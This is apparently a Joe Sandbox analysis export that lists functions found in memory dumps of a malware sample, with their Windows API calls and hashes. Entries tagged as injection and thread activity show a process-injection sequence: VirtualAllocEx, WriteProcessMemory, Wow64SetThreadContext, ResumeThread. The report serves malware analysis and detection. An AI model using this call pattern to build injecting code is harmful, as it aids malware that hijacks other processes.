Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a102873c528c8386cdc9244909eec239a251d3072444f8202ebb160eafa0ccbd
Instruction ID: 2e34e1736220a53b76e76e47edbade111b661ef67afa7a5f55038f3cb12684b5
Opcode Fuzzy Hash: a102873c528c8386cdc9244909eec239a251d3072444f8202ebb160eafa0ccbd
Instruction Fuzzy Hash: B9915BB1D0021ADFDF50DFA8C980B9DBBB2BF48314F1485A9E808B7251DB759A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02E9BCB8 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E9BF1E

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2445f4d34d07452a98b1e64da606dfcc46cce8fc353f1c995d2e31fb724c0137
Instruction ID: 037563fd2e844942d0c531572b752399fe8de37fd91d59625de56bcb31d5aaf4
Opcode Fuzzy Hash: 2445f4d34d07452a98b1e64da606dfcc46cce8fc353f1c995d2e31fb724c0137
Instruction Fuzzy Hash: 928127B0A00B058FDB24DF29D44579ABBF5FF88308F00892ED48AD7A50D775E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 055A2804 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055A2922

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7041209716dfba346c3daaf0ea595dc6c1cc2cf123cb10af148c930de209e9e5
Instruction ID: f2bc0fb4b61e51d18ae2637cb27b079f492d8a8f7785247730454742c7b7ab1f
Opcode Fuzzy Hash: 7041209716dfba346c3daaf0ea595dc6c1cc2cf123cb10af148c930de209e9e5
Instruction Fuzzy Hash: B951DEB5D00309AFDB14CF99C985ADEBBF6BF48310F64852AE819AB214D7759881CF90

Uniqueness

Uniqueness Score: -1.00%

Function 055A1C70 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 055A2922

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f051d966828e41a95575e62e43ee5b25c0b9e37957954921d9c9e0ede73b3ca3
Instruction ID: cc1623b05534e08ec6ef23a6fe909be4d85b2e2e4e647f414e80f365819b7622
Opcode Fuzzy Hash: f051d966828e41a95575e62e43ee5b25c0b9e37957954921d9c9e0ede73b3ca3
Instruction Fuzzy Hash: 0F51DEB5D003499FDB14CF9AC984ADEBBF5BF48710F64852AE819AB210D771A881CF90

Uniqueness

Uniqueness Score: -1.00%

Function 055A1DC4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 055A4EA1

Memory Dump Source

Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 6c2212e0c1fa153d46f5ddd9e7578e87915aa77aaa6780741363042e2bcb0f0b
Instruction ID: 825f9020fa1794e92f481f396a82f9891aeb8c7a434939abd2c5945dc663e391
Opcode Fuzzy Hash: 6c2212e0c1fa153d46f5ddd9e7578e87915aa77aaa6780741363042e2bcb0f0b
Instruction Fuzzy Hash: 284117B5A00205DFCB14CF99C488EAEBBF6FB88314F24C459E519AB321D775A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E94538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02E95DC9

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cfdce2b3ff37d2354d80e3fe342ea9560d316716d0e8ed4c76598622a0066c85
Instruction ID: 3a5840da34c4f3f5cae1ba96a050484458591d536890cc6d8f0c458da395de73
Opcode Fuzzy Hash: cfdce2b3ff37d2354d80e3fe342ea9560d316716d0e8ed4c76598622a0066c85
Instruction Fuzzy Hash: 4341DFB0C00619CBDB24CFA9C984B9EBBF5FF49304F64806AD408AB255DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E95D0D Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 02E95DC9

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 908e444e32a398dec777336e1e385594a11dfdc19b89dbbd2c2acef45105db1f
Instruction ID: 241874a1c34c8eb2802c13e489468397d6d9ae47f5461681e264a1182de0610f
Opcode Fuzzy Hash: 908e444e32a398dec777336e1e385594a11dfdc19b89dbbd2c2acef45105db1f
Instruction Fuzzy Hash: 6041EEB0C00619CBDB24CFA9C984BDEBBF5FF49304F64816AD408AB255DB756986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E9B6B0 Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9BF99,00000800,00000000,00000000), ref: 02E9C1AA

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c7c06ff4730a5b729ee5b9291795630f6a9c47f6a8b6c672236cd99c3d85e2fc
Instruction ID: 250b0dc8f6f84cc479d0d6af7718f1b84c037d624282a3f2475c377b3f2eb82a
Opcode Fuzzy Hash: c7c06ff4730a5b729ee5b9291795630f6a9c47f6a8b6c672236cd99c3d85e2fc
Instruction Fuzzy Hash: E3219AB28043498FDB10DFAAC884BDABFF4EB59314F14906ED458A7311C3749545CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 07C85B18 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C85BB0

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8f347c80435ed36358d8a4cecee38ca1aae1d8a4b85f4fafc9f6ce521064247e
Instruction ID: bf84c3c5b2fd7ed6494dc2c5edba72082c50342fed5487a58a102d0743cccb4c
Opcode Fuzzy Hash: 8f347c80435ed36358d8a4cecee38ca1aae1d8a4b85f4fafc9f6ce521064247e
Instruction Fuzzy Hash: D92137B19003199FCB10DFA9C980BEEBBF5FF48310F10882AE959A7350C7749955CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C85B20 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C85BB0

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1491da1882764e83f0920b73cf2889a3691850f40f10c08e2a6db0c4ed71bbf6
Instruction ID: 67197646bbb3d80d809f6b3ec8093597cc3e8d67c8feb58f58fc105646400143
Opcode Fuzzy Hash: 1491da1882764e83f0920b73cf2889a3691850f40f10c08e2a6db0c4ed71bbf6
Instruction Fuzzy Hash: 172125B19003599FCB10DFA9C885BEEBBF5FF48324F10842AE958A7350C7789954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E9E1A0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9E16E,?,?,?,?,?), ref: 02E9E22F

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d2a56973de1abcd2e92fade6804ffdd12adecee504d46b3b648813c0c9df35ec
Instruction ID: abd4c742291408a87e516254d52ebc11c9c58431eef4a9de771d06e6fc2c323c
Opcode Fuzzy Hash: d2a56973de1abcd2e92fade6804ffdd12adecee504d46b3b648813c0c9df35ec
Instruction Fuzzy Hash: F021E6B59002489FDB10CF99D985ADEFBF8FB48324F14801AE958A3350D774A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E9DAF0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E9E16E,?,?,?,?,?), ref: 02E9E22F

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 76343e8cdf108d82923ca1e1b4228aa844db7166b19c32a49bcbf3a675388be5
Instruction ID: dc4779cfa38efaf185ec442cec1e0c3361800f756dd9ee4549aa66418101867b
Opcode Fuzzy Hash: 76343e8cdf108d82923ca1e1b4228aa844db7166b19c32a49bcbf3a675388be5
Instruction Fuzzy Hash: 8A21E4B5900258EFDB10CF9AD984AEEFBF4FB48310F14841AE958A7350D375A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C85C09 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C85C90

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0b17a0bcfc0f47d35b9611dd8bafc279038ecd82afe1ed4e120f68b1043dbd5d
Instruction ID: d0bba98698e78056159e568fba949d845ffb7e3f5a114b70b0ee6fc62341aeef
Opcode Fuzzy Hash: 0b17a0bcfc0f47d35b9611dd8bafc279038ecd82afe1ed4e120f68b1043dbd5d
Instruction Fuzzy Hash: B92105B1900259DFCB10DFA9D980AEEBBF5FF48320F10842AE559A7250C7789955CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C8554B Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C855CE

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 208d03bf1828704dfa7f270aec8288c08e9e0c50fae958bf0c93037fc8405f39
Instruction ID: d608b106735e07bc8553ed3c7960c346e068953b1691ea69590528ccaf50dc79
Opcode Fuzzy Hash: 208d03bf1828704dfa7f270aec8288c08e9e0c50fae958bf0c93037fc8405f39
Instruction Fuzzy Hash: DD2118B1900209CFDB10DFA9C5857EEBBF5AF88324F14842AD459A7250DB789945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C85550 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C855CE

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9aaaa095e6ac884be52e67efe1b9ee81b8769281373d386c1e92a4d7e31fe0d8
Instruction ID: 381805e5f0589774c07a522c5d8720c01a45e3791cb00e6650537b921274571a
Opcode Fuzzy Hash: 9aaaa095e6ac884be52e67efe1b9ee81b8769281373d386c1e92a4d7e31fe0d8
Instruction Fuzzy Hash: 8A2149B19003098FDB10DFAAC4857EEBBF5EF48324F14842AD459A7250DB789945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 07C85C10 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C85C90

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4215050d44bac78be3c03e5cb33f89a7f87b582418c2c941651eaa9c6d5dfb0d
Instruction ID: 9aca8053b09265708b5523486a1c9590c42c8038ed1e960079f37e9b34be3516
Opcode Fuzzy Hash: 4215050d44bac78be3c03e5cb33f89a7f87b582418c2c941651eaa9c6d5dfb0d
Instruction Fuzzy Hash: 762116B18002599FCB10DFAAC980AEEFBF5FF48320F10842AE559A7250C7749954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E9C138 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9BF99,00000800,00000000,00000000), ref: 02E9C1AA

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 64f98ff9c30e5d97ee29f3fdb90f6ed49f5a64a2b6880f5d884da317ccb4c8c5
Instruction ID: e50eec52500aa0c4f5d761d22e63ff917edb301011392594102e8bd2955e5d55
Opcode Fuzzy Hash: 64f98ff9c30e5d97ee29f3fdb90f6ed49f5a64a2b6880f5d884da317ccb4c8c5
Instruction Fuzzy Hash: 7E1114B69002099FDB10DF9AC944ADEFBF4EB48314F14842AE419A7210C375A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E9B6C8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E9BF99,00000800,00000000,00000000), ref: 02E9C1AA

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5931c69d6cc083919e0a5f4b5f7f0b635b9ae67cf133ee23574ceb1f6de42892
Instruction ID: 0dccf34d9fc4b6a7d1477c3f4e094972651116f19147520a75d811ffbdd61085
Opcode Fuzzy Hash: 5931c69d6cc083919e0a5f4b5f7f0b635b9ae67cf133ee23574ceb1f6de42892
Instruction Fuzzy Hash: 2F1126B6D003499FDB10DF9AD844ADEFBF4EB48314F10942AE519A7310C775A945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 07C85A58 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C85ACE

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 820fc37b23f73010c544cda9c501e88f10d23bac61833734d431cab18de63903
Instruction ID: ebf607731d5ea949ecfcb88c0144b9719fef0db52cd8330e1c224973c573b19b
Opcode Fuzzy Hash: 820fc37b23f73010c544cda9c501e88f10d23bac61833734d431cab18de63903
Instruction Fuzzy Hash: 03118CB1900249CFCF10DFA9C8446EEBBF5FF48320F108419E519A7220C7759954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07C85A60 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C85ACE

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2fa7aa13c0c9cda1f0cc4471e5620d9a56b00451110fa76f9f6a8a17214327fa
Instruction ID: 93e5a0943cfa4a2d6007031ff16c67a41d460f603538372e4681220e7d3d6f5d
Opcode Fuzzy Hash: 2fa7aa13c0c9cda1f0cc4471e5620d9a56b00451110fa76f9f6a8a17214327fa
Instruction Fuzzy Hash: 9A113AB19002499FCB10DFA9C844BEFBFF5EF48324F248419D555A7250C7759954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 07C8549C Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07C85502

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 25bed186fd3c13711812a6e7f10cb974a5fc63a164a50c9b33d26a0f901ed5f5
Instruction ID: 21bf1e00c97c25385cadfff03a15d4e5c2faa7c36b86aa440af67c851854f02f
Opcode Fuzzy Hash: 25bed186fd3c13711812a6e7f10cb974a5fc63a164a50c9b33d26a0f901ed5f5
Instruction Fuzzy Hash: B4116AB1D00349CFCB20DFA9C5447EEFBF5AB88324F24882AD059A7250CB75A944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07C854A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07C85502

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 927c0f34231664f41e6e24a33a55d97e55f767543baf735dad649f91f60cb647
Instruction ID: 26bc48af1582dc694acf5510bd31f4039fa60baabf3ae8c015e8df312eaf9cc9
Opcode Fuzzy Hash: 927c0f34231664f41e6e24a33a55d97e55f767543baf735dad649f91f60cb647
Instruction Fuzzy Hash: 04113AB19003498FCB20DFAAC4457DEFBF5EB88324F248819D559A7250CB75A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E9BEB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E9BF1E

Memory Dump Source

Source File: 00000000.00000002.1734402027.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ee321f524574ff067044e484eca684bd558aa972921d25712cc5f348ed0bab37
Instruction ID: b34956a03b2bf649a3927a41b9eb2a31c2a01acea59c78b94e01293b12837028
Opcode Fuzzy Hash: ee321f524574ff067044e484eca684bd558aa972921d25712cc5f348ed0bab37
Instruction Fuzzy Hash: 3611E0B6D002498FCB10CF9AD944BDEFBF4AB88728F14C46AD869A7210C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07C85E98 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07C8980D

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 06786024e76dbf8bd3224ccc1129e8cb8b013531bf9934d0f01776c5d8e41fdb
Instruction ID: ebbd3dc3f34386908dd438ec6cf555acd1c3a5099261f0368f31d8625914e2a5
Opcode Fuzzy Hash: 06786024e76dbf8bd3224ccc1129e8cb8b013531bf9934d0f01776c5d8e41fdb
Instruction Fuzzy Hash: A511F2B5800349DFCB10DF9AC884BEEBBF8EB48324F10841AE958A7210C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07C897A8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07C8980D

Memory Dump Source

Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0510c43db8c6037a5f194f77e8274be42f6f5403c6d9f862d2a31b0a4ef6a937
Instruction ID: f23175cb8dfad8d575aaa3ec7972f636dfb44a7f2be0dcada32c6813609db350
Opcode Fuzzy Hash: 0510c43db8c6037a5f194f77e8274be42f6f5403c6d9f862d2a31b0a4ef6a937
Instruction Fuzzy Hash: D811F2B5800349DFCB10DF99C589BEEBBF4FB08324F20881AD559A7210C375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0568C990 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

(oq, xrefs: 0568CB82

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: 6cade2d661e7d75c50f3f0a0967c1e5d1282bd7cbdcd981a25d506b3cd40b97e
Instruction ID: 39bea3b9b25482823cf4d9a122be8a7d6b3ddf13389cd3b1ae746c85a6fcc5f2
Opcode Fuzzy Hash: 6cade2d661e7d75c50f3f0a0967c1e5d1282bd7cbdcd981a25d506b3cd40b97e
Instruction Fuzzy Hash: AD91B170A01208DFDB14EFA9D548AAEBBF6FF88310F14856AE455AB750DB349C05CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07C96D14 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Tekq, xrefs: 07C9E721

Memory Dump Source

Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: d5db98279a308b711cdce03ed7ba7d7df03a98f6eeba982b75b71075eef9112a
Instruction ID: dbc2a040e27363c81790be9efe2debcaa4bfaf5355a2112a999d22dd4dfa6ebd
Opcode Fuzzy Hash: d5db98279a308b711cdce03ed7ba7d7df03a98f6eeba982b75b71075eef9112a
Instruction Fuzzy Hash: 8151A175B0020A8FCB10DB7998989BEBBF6EFC52207148569E425DB355EF30DD058B91

Uniqueness

Uniqueness Score: -1.00%

Function 05684B48 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

Hoq, xrefs: 05684C67

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: Hoq
API String ID: 0-3049094369
Opcode ID: 42b8596b884d895b3e7cf6c23c9c28efbc3090e5f11893eed4ac810b5102daa2
Instruction ID: 0d3a661457119dd40eff5ed7da040b9343797393c0c87f8b3efe7b6cdbf99001
Opcode Fuzzy Hash: 42b8596b884d895b3e7cf6c23c9c28efbc3090e5f11893eed4ac810b5102daa2
Instruction Fuzzy Hash: A04125317002169BCB15AFB9985467F7AABFBC4352F24852AE906C7394DE39CC42C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0568AED8 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

Hoq, xrefs: 0568AEE9

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: Hoq
API String ID: 0-3049094369
Opcode ID: 40a7eff290fd96815d37866a39548361db99567c8b94907c56ba01a899f43829
Instruction ID: 1fa99e5f73d0be1b12af1f12913ce643c912cce2077a030a11b20eddc7ee27fd
Opcode Fuzzy Hash: 40a7eff290fd96815d37866a39548361db99567c8b94907c56ba01a899f43829
Instruction Fuzzy Hash: 1D318235A10209DBCB05DFA4D8599AEFBB6FF99300F10492AE5026B354DF75A805CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05684964 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

%Xl, xrefs: 05684F3A

Memory Dump Source

Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd

Similarity

API ID:
String ID: %Xl
API String ID: 0-4154566454
Opcode ID: fdb58c43b4af908fe20e43a040a2470bb209942f61305c1430e9375164674fd8
Instruction ID: da67639c52649ab4232c33909a20facae3fbef74ccda2d866983ebf1edcf6ef8
Opcode Fuzzy Hash: fdb58c43b4af908fe20e43a040a2470bb209942f61305c1430e9375164674fd8
Instruction Fuzzy Hash: FF41C1B1D002098BDB20DFE9C584ADEFBB5BF48304F648529D419BB354DB756A86CF90

Uniqueness

